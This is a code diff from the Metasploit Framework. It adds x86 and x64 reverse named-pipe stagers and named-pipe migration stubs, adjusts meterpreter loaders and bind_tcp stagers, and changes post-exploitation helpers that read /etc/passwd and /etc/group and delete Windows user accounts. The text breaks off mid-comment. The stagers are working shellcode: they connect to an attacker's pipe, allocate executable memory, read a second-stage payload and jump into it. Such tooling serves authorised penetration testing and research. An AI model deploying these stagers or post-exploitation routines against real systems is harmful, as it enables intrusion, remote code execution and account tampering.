a/lib/msf/core/payload/windows/bind_tcp.rb +++ b/lib/msf/core/payload/windows/bind_tcp.rb @@ -35,7 +35,7 @@ module Payload::Windows::BindTcp # Generate the more advanced stager if we have the space if self.available_space && required_space <= self.available_space - conf[:exitfunk] = datastore['EXITFUNC'], + conf[:exitfunk] = datastore['EXITFUNC'] conf[:reliable] = true end diff --git a/lib/msf/core/payload/windows/bind_tcp_rc4.rb b/lib/msf/core/payload/windows/bind_tcp_rc4.rb index d8cdbddb97..37657ddc8a 100644 --- a/lib/msf/core/payload/windows/bind_tcp_rc4.rb +++ b/lib/msf/core/payload/windows/bind_tcp_rc4.rb @@ -33,7 +33,7 @@ module Payload::Windows::BindTcpRc4 # Generate the more advanced stager if we have the space if self.available_space && required_space <= self.available_space - conf[:exitfunk] = datastore['EXITFUNC'], + conf[:exitfunk] = datastore['EXITFUNC'] conf[:reliable] = true end diff --git a/lib/msf/core/payload/windows/meterpreter_loader.rb b/lib/msf/core/payload/windows/meterpreter_loader.rb index 922aa9951d..98824221e3 100644 --- a/lib/msf/core/payload/windows/meterpreter_loader.rb +++ b/lib/msf/core/payload/windows/meterpreter_loader.rb @@ -28,7 +28,7 @@ module Payload::Windows::MeterpreterLoader ], 'Platform' => 'win', 'Arch' => ARCH_X86, - 'PayloadCompat' => { 'Convention' => 'sockedi -https', }, + 'PayloadCompat' => { 'Convention' => 'sockedi handleedi -https', }, 'Stage' => { 'Payload' => "" } )) end @@ -53,9 +53,9 @@ module Payload::Windows::MeterpreterLoader add ebx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])} ^ - unless opts[:stageless] + unless opts[:stageless] || opts[:force_write_handle] == true asm << %Q^ - mov [ebx], edi ; write the current socket to the config + mov [ebx], edi ; write the current socket/handle to the config ^ end @@ -77,13 +77,14 @@ module Payload::Windows::MeterpreterLoader # create the configuration block, which for staged connections is really simple. config_opts = { - arch: opts[:uuid].arch, - exitfunk: ds['EXITFUNC'], - expiration: ds['SessionExpirationTimeout'].to_i, - uuid: opts[:uuid], - transports: opts[:transport_config] || [transport_config(opts)], - extensions: [], - stageless: opts[:stageless] == true + arch: opts[:uuid].arch, + null_session_guid: opts[:null_session_guid] == true, + exitfunk: ds[:exit_func] || ds['EXITFUNC'], + expiration: (ds[:expiration] || ds['SessionExpirationTimeout']).to_i, + uuid: opts[:uuid], + transports: opts[:transport_config] || [transport_config(opts)], + extensions: [], + stageless: opts[:stageless] == true } # create the configuration instance based off the parameters diff --git a/lib/msf/core/payload/windows/migrate.rb b/lib/msf/core/payload/windows/migrate.rb index f9b924780e..ca94445209 100644 --- a/lib/msf/core/payload/windows/migrate.rb +++ b/lib/msf/core/payload/windows/migrate.rb @@ -3,3 +3,4 @@ require 'msf/core/payload/windows/block_api' require 'msf/core/payload/windows/migrate_tcp' require 'msf/core/payload/windows/migrate_http' +require 'msf/core/payload/windows/migrate_named_pipe' diff --git a/lib/msf/core/payload/windows/migrate_named_pipe.rb b/lib/msf/core/payload/windows/migrate_named_pipe.rb new file mode 100644 index 0000000000..46344e106d --- /dev/null +++ b/lib/msf/core/payload/windows/migrate_named_pipe.rb @@ -0,0 +1,47 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/windows/migrate_common' + +module Msf + +### +# +# Payload that supports migrating over Named Pipe transports on x86. +# +### + +module Payload::Windows::MigrateNamedPipe + + include Msf::Payload::Windows::MigrateCommon + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Migrate over Named Pipe transport', + 'Description' => 'Migration stub to use over Named Pipe transports', + 'Author' => ['OJ Reeves'], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + )) + end + + # + # Constructs the payload + # + def generate_migrate(opts = {}) + %Q^ + start_migrate_pipe: + mov edi, [esi+16] ; The duplicated pipe handle is in the migrate context. + signal_pipe_event: + push dword [esi] ; Event handle is pointed at by esi + push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')} + call ebp ; SetEvent(handle) + call_pipe_payload: + call dword [esi+8] ; call the associated payload + ^ + end + +end + +end diff --git a/lib/msf/core/payload/windows/reverse_named_pipe.rb b/lib/msf/core/payload/windows/reverse_named_pipe.rb new file mode 100644 index 0000000000..1049b96519 --- /dev/null +++ b/lib/msf/core/payload/windows/reverse_named_pipe.rb @@ -0,0 +1,287 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/transport_config' +require 'msf/core/payload/windows/send_uuid' +require 'msf/core/payload/windows/block_api' +require 'msf/core/payload/windows/exitfunk' + +module Msf + +### +# +# Complex reverse_named_pipe payload generation for Windows ARCH_X86 +# +### + +module Payload::Windows::ReverseNamedPipe + + include Msf::Payload::TransportConfig + include Msf::Payload::Windows + include Msf::Payload::Windows::SendUUID + include Msf::Payload::Windows::BlockApi + include Msf::Payload::Windows::Exitfunk + + # + # Register reverse_named_pipe specific options + # + def initialize(*args) + super + end + + # + # Generate the first stage + # + def generate + conf = { + name: datastore['PIPENAME'], + host: datastore['PIPEHOST'] || '.', + retry_count: datastore['ReverseConnectRetries'], + reliable: false + } + + # Generate the advanced stager if we have space + unless self.available_space.nil? || required_space > self.available_space + conf[:exitfunk] = datastore['EXITFUNC'] + conf[:reliable] = true + end + + generate_reverse_named_pipe(conf) + end + + # + # By default, we don't want to send the UUID, but we'll send + # for certain payloads if requested. + # + def include_send_uuid + false + end + + def transport_config(opts={}) + transport_config_reverse_named_pipe(opts) + end + + # + # Generate and compile the stager + # + def generate_reverse_named_pipe(opts={}) + combined_asm = %Q^ + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. + #{asm_block_api} + start: + pop ebp + #{asm_reverse_named_pipe(opts)} + ^ + + #"\xCC" + Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string + Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string + end + + # + # Determine the maximum amount of space required for the features requested + # + def required_space + # Start with our cached default generated size + space = cached_size + + # EXITFUNK 'thread' is the biggest by far, adds 29 bytes. + space += 29 + + # Reliability adds some bytes! + space += 44 + + space += uuid_required_size if include_send_uuid + + # The final estimated size + space + end + + # + # Generate an assembly stub with the configured feature set and options. + # + # @option opts [Fixnum] :port The port to connect to + # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh + # @option opts [Bool] :reliable Whether or not to enable error handling code + # + def asm_reverse_named_pipe(opts={}) + + retry_count = [opts[:retry_count].to_i, 1].max + reliable = opts[:reliable] + # we have to double-escape because of metasm + full_pipe_name = "\\\\\\\\#{opts[:host]}\\\\pipe\\\\#{opts[:name]}" + + asm = %Q^ + ; Input: EBP must be the address of 'api_call'. + ; Output: EDI will be the handle for the pipe to the server + + retry_start: + push #{retry_count} ; retry counter + mov esi, esp ; keep track of where the variables are + + try_reverse_named_pipe: + ; Start by setting up the call to CreateFile + xor ebx, ebx ; EBX will be used for pushing zero + push ebx ; hTemplateFile + push ebx ; dwFlagsAndAttributes + push 3 ; dwCreationDisposition (OPEN_EXISTING) + push ebx ; lpSecurityAttributes + push ebx ; dwShareMode + push 0xC0000000 ; dwDesiredAccess (GENERIC_READ|GENERIC_WRITE) + call get_pipe_name + db "#{full_pipe_name}", 0x00 + get_pipe_name: + ; lpFileName (via call) + push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')} + call ebp ; CreateFileA(...) + + ; If eax is -1, then we had a failure. + cmp eax, -1 ; -1 means a failure + jnz connected + + handle_connect_failure: + ; decrement our attempt count and try again + dec [esi] + jnz try_reverse_named_pipe + ^ + + if opts[:exitfunk] + asm << %Q^ + failure: + call exitfunk + ^ + else + asm << %Q^ + failure: + push 0x56A2B5F0 ; hardcoded to exitprocess for size + call ebp + ^ + end + + asm << %Q^ + ; this label is required so that reconnect attempts include + ; the UUID stuff if required. + connected: + xchg edi, eax ; edi now has the file handle we'll need in future + ^ + + asm << asm_write_uuid if include_send_uuid + + asm << %Q^ + ; Receive the size of the incoming second stage... + push ebx ; buffer for lpNumberOfBytesRead + mov ecx, esp + push ebx ; buffer for lpBuffer + mov esi, esp + push ebx ; lpOverlapped + push ecx ; lpNumberOfBytesRead + push 4 ; nNumberOfBytesToRead = sizeof( DWORD ); + push esi ; lpBuffer + push edi ; hFile + push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + call ebp ; ReadFile(...) to read the size + ^ + + if reliable + asm << %Q^ + ; reliability: check to see if the file read worked, retry otherwise + ; if it fails + test eax, eax + jz cleanup_file + mov eax, [esi+4] ; check to see if bytes were read + test eax, eax + jz cleanup_file + ^ + end + + asm << %Q^ + ; Alloc a RWX buffer for the second stage + mov esi, [esi] ; dereference the pointer to the second stage length + push 0x40 ; PAGE_EXECUTE_READWRITE + push 0x1000 ; MEM_COMMIT + push esi ; push the newly received second stage length. + push 0 ; NULL as we dont care where the allocation is. + push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); + ; Receive the second stage and execute it... + xchg ebx, eax ; ebx = our new memory address for the new stage + push ebx ; push the address of the new stage so we can return into it + + read_more: + ; prepare the size min(0x10000, esi) + mov ecx, 0x10000 ; stupid named pipe buffer limit + cmp ecx, esi + jle size_is_good + mov ecx, esi + + size_is_good: + ; Invoke a read + push eax ; space for the number of bytes + mov eax, esp ; store the pointer + push 0 ; lpOverlapped + push eax ; lpNumberOfBytesRead + push ecx ; nNumberOfBytesToRead + push ebx ; lpBuffer + push edi ; hFile + push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + call ebp ; ReadFile(...) to read the data + ^ + + if reliable + asm << %Q^ + ; reliability: check to see if the recv worked, and reconnect + ; if it fails + cmp eax, 0 + jz read_failed + pop eax ; get the number of bytes read + cmp eax, 0 + jnz read_successful + + read_failed: + ; something failed, free up memory + pop eax ; get the address of the payload + push 0x4000 ; dwFreeType (MEM_DECOMMIT) + push 0 ; dwSize + push eax ; lpAddress + push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT) + + cleanup_file: + ; clear up the named pipe handle + push edi ; named pipe handle + push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')} + call ebp ; CloseHandle(...) + + ; restore the stack back to the connection retry count + pop esi + pop esi + pop esi + dec [esp] ; decrement the counter + + ; try again + jmp try_reverse_named_pipe + ^ + else + asm << %Q^ + pop eax ; pop bytes read + ^ + end + + asm << %Q^ + read_successful: + add ebx, eax ; buffer += bytes_received + sub esi, eax ; length -= bytes_received, will set flags + jnz read_more ; continue if we have more to read + ret ; return into the second stage + ^ + + if opts[:exitfunk] + asm << asm_exitfunk(opts) + end + + asm + end + +end + +end diff --git a/lib/msf/core/payload/windows/x64/bind_tcp.rb b/lib/msf/core/payload/windows/x64/bind_tcp.rb index 46f7c0b744..f55de65339 100644 --- a/lib/msf/core/payload/windows/x64/bind_tcp.rb +++ b/lib/msf/core/payload/windows/x64/bind_tcp.rb @@ -33,7 +33,7 @@ module Payload::Windows::BindTcp_x64 # Generate the more advanced stager if we have the space if self.available_space && required_space <= self.available_space - conf[:exitfunk] = datastore['EXITFUNC'], + conf[:exitfunk] = datastore['EXITFUNC'] conf[:reliable] = true end diff --git a/lib/msf/core/payload/windows/x64/meterpreter_loader.rb b/lib/msf/core/payload/windows/x64/meterpreter_loader.rb index ce70242b53..257e2cc79c 100644 --- a/lib/msf/core/payload/windows/x64/meterpreter_loader.rb +++ b/lib/msf/core/payload/windows/x64/meterpreter_loader.rb @@ -29,7 +29,7 @@ module Payload::Windows::MeterpreterLoader_x64 ], 'Platform' => 'win', 'Arch' => ARCH_X64, - 'PayloadCompat' => { 'Convention' => 'sockrdi' }, + 'PayloadCompat' => { 'Convention' => 'sockrdi handlerdi -https' }, 'Stage' => { 'Payload' => "" } )) end @@ -42,22 +42,23 @@ module Payload::Windows::MeterpreterLoader_x64 push rbp ; save rbp mov rbp, rsp ; set up a new stack frame sub rsp, 32 ; allocate some space for calls. + and rsp, ~0xF ; Ensure RSP is 16 byte aligned ; GetPC call $+5 ; relative call to get location pop rbx ; pop return value ; Invoke ReflectiveLoader() ; add the offset to ReflectiveLoader() - add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x11)} + add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x15)} call rbx ; invoke ReflectiveLoader() ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr) ; offset from ReflectiveLoader() to the end of the DLL add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])} ^ - unless opts[:stageless] + unless opts[:stageless] || opts[:force_write_handle] == true asm << %Q^ - ; store the comms socket handle - mov dword ptr [rbx], edi + ; store the comms socket or handle + mov [rbx], rdi ^ end @@ -79,13 +80,14 @@ module Payload::Windows::MeterpreterLoader_x64 # create the configuration block, which for staged connections is really simple. config_opts = { - arch: opts[:uuid].arch, - exitfunk: ds['EXITFUNC'], - expiration: ds['SessionExpirationTimeout'].to_i, - uuid: opts[:uuid], - transports: opts[:transport_config] || [transport_config(opts)], - extensions: [], - stageless: opts[:stageless] == true + arch: opts[:uuid].arch, + null_session_guid: opts[:null_session_guid] == true, + exitfunk: ds[:exit_func] || ds['EXITFUNC'], + expiration: (ds[:expiration] || ds['SessionExpirationTimeout']).to_i, + uuid: opts[:uuid], + transports: opts[:transport_config] || [transport_config(opts)], + extensions: [], + stageless: opts[:stageless] == true } # create the configuration instance based off the parameters diff --git a/lib/msf/core/payload/windows/x64/migrate.rb b/lib/msf/core/payload/windows/x64/migrate.rb index 20fad5bb2d..770147cc58 100644 --- a/lib/msf/core/payload/windows/x64/migrate.rb +++ b/lib/msf/core/payload/windows/x64/migrate.rb @@ -3,3 +3,4 @@ require 'msf/core/payload/windows/x64/block_api' require 'msf/core/payload/windows/x64/migrate_tcp' require 'msf/core/payload/windows/x64/migrate_http' +require 'msf/core/payload/windows/x64/migrate_named_pipe' diff --git a/lib/msf/core/payload/windows/x64/migrate_named_pipe.rb b/lib/msf/core/payload/windows/x64/migrate_named_pipe.rb new file mode 100644 index 0000000000..193090f5fc --- /dev/null +++ b/lib/msf/core/payload/windows/x64/migrate_named_pipe.rb @@ -0,0 +1,47 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/windows/migrate_common' + +module Msf + +### +# +# Payload that supports migrating over Named Pipe transports on x64. +# +### + +module Payload::Windows::MigrateNamedPipe_x64 + + include Msf::Payload::Windows::MigrateCommon_x64 + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Migrate over Named Pipe transport (x64)', + 'Description' => 'Migration stub to use over Named Pipe transports (x64)', + 'Author' => ['OJ Reeves'], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X64, + )) + end + + # + # Constructs the payload + # + def generate_migrate(opts = {}) + %Q^ + start_migrate_pipe: + mov rdi, qword [rsi+16] ; The duplicated pipe handle is in the migrate context. + signal_pipe_event: + mov rcx, qword [rsi] ; Event handle is pointed at by rsi + mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')} + call rbp ; SetEvent(handle) + call_pipe_payload: + call qword [rsi+8] ; call the associated payload + ^ + end + +end + +end diff --git a/lib/msf/core/payload/windows/x64/reverse_named_pipe.rb b/lib/msf/core/payload/windows/x64/reverse_named_pipe.rb new file mode 100644 index 0000000000..b04ba63f75 --- /dev/null +++ b/lib/msf/core/payload/windows/x64/reverse_named_pipe.rb @@ -0,0 +1,283 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/transport_config' +require 'msf/core/payload/windows/x64/send_uuid' +require 'msf/core/payload/windows/x64/block_api' +require 'msf/core/payload/windows/x64/exitfunk' + +module Msf + +### +# +# Complex reverse_named_pipe payload generation for Windows ARCH_X86_64 +# ### + +module Payload::Windows::ReverseNamedPipe_x64 + + include Msf::Payload::TransportConfig + include Msf::Payload::Windows + include Msf::Payload::Windows::SendUUID_x64 + include Msf::Payload::Windows::BlockApi_x64 + include Msf::Payload::Windows::Exitfunk_x64 + + # + # Register reverse_named_pipe specific options + # + def initialize(*args) + super + end + + # + # Generate the first stage + # + def generate + conf = { + name: datastore['PIPENAME'], + host: datastore['PIPEHOST'], + retry_count: datastore['ReverseConnectRetries'], + reliable: false + } + + # Generate the advanced stager if we have space + unless self.available_space.nil? || required_space > self.available_space + conf[:exitfunk] = datastore['EXITFUNC'] + conf[:reliable] = true + end + + generate_reverse_named_pipe(conf) + end + + # + # By default, we don't want to send the UUID, but we'll send + # for certain payloads if requested. + # + def include_send_uuid + false + end + + # + # Generate and compile the stager + # + def generate_reverse_named_pipe(opts={}) + combined_asm = %Q^ + cld ; Clear the direction flag. + and rsp, ~0xF ; Ensure RSP is 16 byte aligned + call start ; Call start, this pushes the address of 'api_call' onto the stack. + #{asm_block_api} + start: + pop rbp ; block API pointer + #{asm_reverse_named_pipe(opts)} + ^ + Metasm::Shellcode.assemble(Metasm::X64.new, combined_asm).encode_string + end + + def transport_config(opts={}) + transport_config_reverse_named_pipe(opts) + end + + # + # Determine the maximum amount of space required for the features requested + # + def required_space + # Start with our cached default generated size + space = cached_size + + # EXITFUNK 'seh' is the worst case, that adds 15 bytes + space += 15 + + # Reliability adds bytes! + space += 57 + + space += uuid_required_size if include_send_uuid + + # The final estimated size + space + end + + # + # Generate an assembly stub with the configured feature set and options. + # + # @option opts [Fixnum] :port The port to connect to + # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh + # @option opts [Bool] :reliable Whether or not to enable error handling code + # + def asm_reverse_named_pipe(opts={}) + + #reliable = opts[:reliable] + reliable = false + retry_count = [opts[:retry_count].to_i, 1].max + full_pipe_name = "\\\\\\\\#{opts[:host]}\\\\pipe\\\\#{opts[:name]}" + + asm = %Q^ + ; Input: RBP must be the address of 'api_call' + ; Output: RDI will be the handle to the named pipe. + + retry_start: + push #{retry_count} ; retry counter + pop r14 + + ; Func(rcx, rdx, r8, r9, stack ...) + try_reverse_named_pipe: + call get_pipe_name + db "#{full_pipe_name}", 0x00 + get_pipe_name: + pop rcx ; lpFileName + ; Start by setting up the call to CreateFile + push 0 ; alignment + push 0 ; hTemplateFile + push 0 ; dwFlagsAndAttributes + push 3 ; dwCreationDisposition (OPEN_EXISTING) + xor r9, r9 ; lpSecurityAttributes + xor r8, r8 ; dwShareMode + mov rdx, 0xC0000000 ; dwDesiredAccess(GENERIC_READ|GENERIC_WRITE) + mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')} + call rbp ; CreateFileA(...) + + ; check for failure + cmp rax, -1 ; did it work? + jnz connected + + handle_connect_failure: + dec r14 ; decrement the retry count + jnz retry_start + ^ + + if opts[:exitfunk] + asm << %Q^ + failure: + call exitfunk + ^ + else + asm << %Q^ + failure: + push 0x56A2B5F0 ; hardcoded to exitprocess for size + call rbp + ^ + end + + asm << %Q^ + ; this lable is required so that reconnect attempts include + ; the UUID stuff if required. + connected: + xchg rdi, rax ; Save the file handler for later + ^ + asm << asm_write_uuid if include_send_uuid + + asm << %Q^ + ; Receive the size of the incoming second stage... + push 0 ; buffer for lpNumberOfBytesRead + mov r9, rsp ; lpNumberOfBytesRead + push 0 ; buffer for lpBuffer + mov rsi, rsp ; lpNumberOfBytesRead + push 4 ; sizeof(DWORD) + pop r8 ; nNumberOfBytesToRead + push 0 ; alignment + push 0 ; lpOverlapped + mov rdx, rsi ; lpBuffer + mov rcx, rdi ; hFile + mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + call rbp ; ReadFile(...) + ^ + + if reliable + asm << %Q^ + ; reliability: check to see if the received worked, and reconnect + ; if it fails + test eax, eax + jz cleanup_file + mov rax, [rsi+8] + test eax, eax + jz cleanup_file + ^ + end + + asm << %Q^ + + ; Alloc a RWX buffer for the second stage + add rsp, 0x30 ; slight stack adjustment + pop rsi ; pop off the second stage length + pop rax ; line the stack up again + mov esi, esi ; only use the lower-order 32 bits for the size + push 0x40 ; + pop r9 ; PAGE_EXECUTE_READWRITE + push 0x1000 ; + pop r8 ; MEM_COMMIT + mov rdx, rsi ; the newly recieved second stage length. + xor rcx, rcx ; NULL as we dont care where the allocation is. + mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); + ; Receive the second stage and execute it... + mov rbx, rax ; rbx = our new memory address for the new stage + mov r15, rax ; save the address so we can jump into it later + + read_more: + ; prepare the size min(0x10000, esi) + mov r8, 0x10000 ; stupid named pipe buffer limit + cmp r8, rsi + jle size_is_good + mov r8, rsi + + size_is_good: + ; Invoke a read + push 0 ; buffer for lpNumberOfBytesRead + mov r9, rsp ; lpNumberOfBytesRead + mov rdx, rbx ; lpBuffer + push 0 ; lpOverlapped + mov rcx, rdi ; hFile + mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + call rbp ; ReadFile(...) + add rsp, 0x28 ; slight stack adjustment + ^ + + if reliable + asm << %Q^ + ; reliability: check to see if the read worked + ; if it fails + test eax, eax + jnz read_successful + + ; something failed so free up memory + pop rax + push r15 + pop rcx ; lpAddress + push 0x4000 ; MEM_DECOMMIT + pop r8 ; dwFreeType + push 0 ; 0 + pop rdx ; dwSize + mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + call rbp ; VirtualFree(payload, 0, MEM_DECOMMIT) + + cleanup_file: + ; clean up the socket + push rdi ; file handle + pop rcx ; hFile + mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')} + call rbp + + ; and try again + dec r14 ; decrement the retry count + jmp retry_start + ^ + end + + asm << %Q^ + read_successful: + pop rax + add rbx, rax ; buffer += bytes_received + sub rsi, rax ; length -= bytes_received + test rsi, rsi ; test length + jnz read_more ; continue if we have more to read + jmp r15 ; return into the second stage + ^ + + if opts[:exitfunk] + asm << asm_exitfunk(opts) + end + + asm + end + +end + +end diff --git a/lib/msf/core/post/unix.rb b/lib/msf/core/post/unix.rb index b09425f198..37637f147e 100644 --- a/lib/msf/core/post/unix.rb +++ b/lib/msf/core/post/unix.rb @@ -40,14 +40,17 @@ module Msf::Post::Unix # def get_groups groups = [] - cmd_out = read_file("/etc/group").split("\n") - cmd_out.each do |l| - entry = {} - user_field = l.split(":") - entry[:name] = user_field[0] - entry[:gid] = user_field[2] - entry[:users] = user_field[3] - groups << entry + group = '/etc/group' + if file_exist?(group) + cmd_out = read_file(group).split("\n") + cmd_out.each do |l| + entry = {} + user_field = l.split(":") + entry[:name] = user_field[0] + entry[:gid] = user_field[2] + entry[:users] = user_field[3] + groups << entry + end end return groups end @@ -59,8 +62,11 @@ module Msf::Post::Unix user_dirs = [] # get all user directories from /etc/passwd - read_file("/etc/passwd").each_line do |passwd_line| - user_dirs << passwd_line.split(/:/)[5] + passwd = '/etc/passwd' + if file_exist?(passwd) + read_file(passwd).each_line do |passwd_line| + user_dirs << passwd_line.split(/:/)[5] + end end # also list other common places for home directories in the event that diff --git a/lib/msf/core/post/windows/accounts.rb b/lib/msf/core/post/windows/accounts.rb index 72dc1bcc11..58f5655153 100644 --- a/lib/msf/core/post/windows/accounts.rb +++ b/lib/msf/core/post/windows/accounts.rb @@ -3,336 +3,342 @@ require 'msf/core/post/windows/error' module Msf -class Post -module Windows + class Post + module Windows + module Accounts + include Msf::Post::Windows::Error -module Accounts - include Msf::Post::Windows::Error + GUID = [ + ['Data1', :DWORD], + ['Data2', :WORD], + ['Data3', :WORD], + ['Data4', 'BYTE[8]'] + ].freeze - GUID = [ - ['Data1',:DWORD], - ['Data2',:WORD], - ['Data3',:WORD], - ['Data4','BYTE[8]'] - ] + DOMAIN_CONTROLLER_INFO = [ + ['DomainControllerName', :LPSTR], + ['DomainControllerAddress', :LPSTR], + ['DomainControllerAddressType', :ULONG], + ['DomainGuid', GUID], + ['DomainName', :LPSTR], + ['DnsForestName', :LPSTR], + ['Flags', :ULONG], + ['DcSiteName', :LPSTR], + ['ClientSiteName', :LPSTR] + ].freeze - DOMAIN_CONTROLLER_INFO = [ - ['DomainControllerName',:LPSTR], - ['DomainControllerAddress',:LPSTR], - ['DomainControllerAddressType',:ULONG], - ['DomainGuid',GUID], - ['DomainName',:LPSTR], - ['DnsForestName',:LPSTR], - ['Flags',:ULONG], - ['DcSiteName',:LPSTR], - ['ClientSiteName',:LPSTR] - ] + ## + # get_domain(server_name = nil) + # + # Summary: + # Retrieves the current DomainName the given server is + # a member of. + # + # Parameters + # server_name - DNS or NetBIOS name of the remote server + # Returns: + # The DomainName of the remote server or nil if windows + # could not retrieve the DomainControllerInfo or encountered + # an exception. + # + ## + def get_domain(server_name = nil) + domain = nil + result = session.railgun.netapi32.DsGetDcNameA( + server_name, + nil, + nil, + nil, + 0, + 4 + ) - ## - # get_domain(server_name=nil) - # - # Summary: - # Retrieves the current DomainName the given server is - # a member of. - # - # Parameters - # server_name - DNS or NetBIOS name of the remote server - # Returns: - # The DomainName of the remote server or nil if windows - # could not retrieve the DomainControllerInfo or encountered - # an exception. - # - ## - def get_domain(server_name=nil) - domain = nil - result = session.railgun.netapi32.DsGetDcNameA( - server_name, - nil, - nil, - nil, - 0, - 4) + begin + dc_info_addr = result['DomainControllerInfo'] + unless dc_info_addr == 0 + dc_info = session.railgun.util.read_data(DOMAIN_CONTROLLER_INFO, dc_info_addr) + pointer = session.railgun.util.unpack_pointer(dc_info['DomainName']) + domain = session.railgun.util.read_string(pointer) + end + ensure + session.railgun.netapi32.NetApiBufferFree(dc_info_addr) + end - begin - dc_info_addr = result['DomainControllerInfo'] - unless dc_info_addr == 0 - dc_info = session.railgun.util.read_data(DOMAIN_CONTROLLER_INFO, dc_info_addr) - pointer = session.railgun.util.unpack_pointer(dc_info['DomainName']) - domain = session.railgun.util.read_string(pointer) - end - ensure - session.railgun.netapi32.NetApiBufferFree(dc_info_addr) - end + domain + end - domain - end + ## + # delete_user(username, server_name = nil) + # + # Summary: + # Deletes a user account from the given server (or local if none given) + # + # Parameters + # username - The username of the user to delete (not-qualified, e.g. BOB) + # server_name - DNS or NetBIOS name of remote server on which to delete user + # + # Returns: + # One of the following: + # :success - Everything went as planned + # :invalid_server - The server name provided was invalid + # :not_on_primary - Operation allowed only on domain controller + # :user_not_found - User specified does not exist on the given server + # :access_denied - You do not have permission to delete the given user + # + # OR nil if there was an exceptional Windows error (example: ran out of memory) + # + # Caveats: + # nil is returned if there is an *exceptional* Windows error. That error is printed. + # Everything other than ':success' signifies failure + ## + def delete_user(username, server_name = nil) + deletion = client.railgun.netapi32.NetUserDel(server_name, username) - ## - # delete_user(username, server_name = nil) - # - # Summary: - # Deletes a user account from the given server (or local if none given) - # - # Parameters - # username - The username of the user to delete (not-qualified, e.g. BOB) - # server_name - DNS or NetBIOS name of remote server on which to delete user - # - # Returns: - # One of the following: - # :success - Everything went as planned - # :invalid_server - The server name provided was invalid - # :not_on_primary - Operation allowed only on domain controller - # :user_not_found - User specified does not exist on the given server - # :access_denied - You do not have permission to delete the given user - # - # OR nil if there was an exceptional windows error (example: ran out of memory) - # - # Caveats: - # nil is returned if there is an *exceptional* windows error. That error is printed. - # Everything other than ':success' signifies failure - ## - def delete_user(username, server_name = nil) - deletion = client.railgun.netapi32.NetUserDel(server_name, username) + # http://msdn.microsoft.com/en-us/library/aa370674.aspx + case deletion['return'] + when 2221 # NERR_UserNotFound + return :user_not_found + when 2351 # NERR_InvalidComputer + return :invalid_server + when 2226 # NERR_NotPrimary + return :not_on_primary + when client.railgun.const('ERROR_ACCESS_DENIED') + return :access_denied + when 0 + return :success + else + error = deletion['GetLastError'] + if error != 0 + print_error "Unexpected Windows System Error #{error}" + else + # Uh... we shouldn't be here + print_error "DeleteUser unexpectedly returned #{deletion['return']}" + end + end - #http://msdn.microsoft.com/en-us/library/aa370674.aspx - case deletion['return'] - when 2221 # NERR_UserNotFound - return :user_not_found - when 2351 # NERR_InvalidComputer - return :invalid_server - when 2226 # NERR_NotPrimary - return :not_on_primary - when client.railgun.const('ERROR_ACCESS_DENIED') - return :access_denied - when 0 - return :success - else - error = deletion['GetLastError'] - if error != 0 - print_error "Unexpected Windows System Error #{error}" - else - # Uh... we shouldn't be here - print_error "DeleteUser unexpectedly returned #{deletion['return']}" - end - end + # If we got here, then something above failed + nil + end - # If we got here, then something above failed - return nil - end + ## + # resolve_sid(sid, system_name = nil) + # + # Summary: + # Retrieves the name, domain, and type of account for the given sid + # + # Parameters: + # sid - A SID string (e.g. S-1-5-32-544) + # system_name - Where to search. If nil, first local system then trusted DCs + # + # Returns: + # { + # name: account name (e.g. "SYSTEM") + # domain: domain where the account name was found. May have values such as + # the work station's name, BUILTIN, NT AUTHORITY, or an empty string + # type: one of :user, :group, :domain, :alias, :well_known_group, + # :deleted_account, :invalid, :unknown, :computer + # mapped: There was a mapping found for the SID + # } + # + # OR nil if there was an exceptional Windows error (example: ran out of memory) + # + # Caveats: + # If a valid mapping is not found, only { mapped: false } will be returned + # nil is returned if there is an *exceptional* Windows error. That error is printed. + # If an invalid system_name is provided, there will be a Windows error and nil returned + ## + def resolve_sid(sid, system_name = nil) + adv = client.railgun.advapi32 + # Second param is the size of the buffer where the pointer will be written + # In railgun, if you specify 4 bytes for a PDWORD it will grow to 8, as needed. + conversion = adv.ConvertStringSidToSidA(sid, 4) - ## - # resolve_sid(sid, system_name = nil) - # - # Summary: - # Retrieves the name, domain, and type of account for the given sid - # - # Parameters: - # sid - A SID string (e.g. S-1-5-32-544) - # system_name - Where to search. If nil, first local system then trusted DCs - # - # 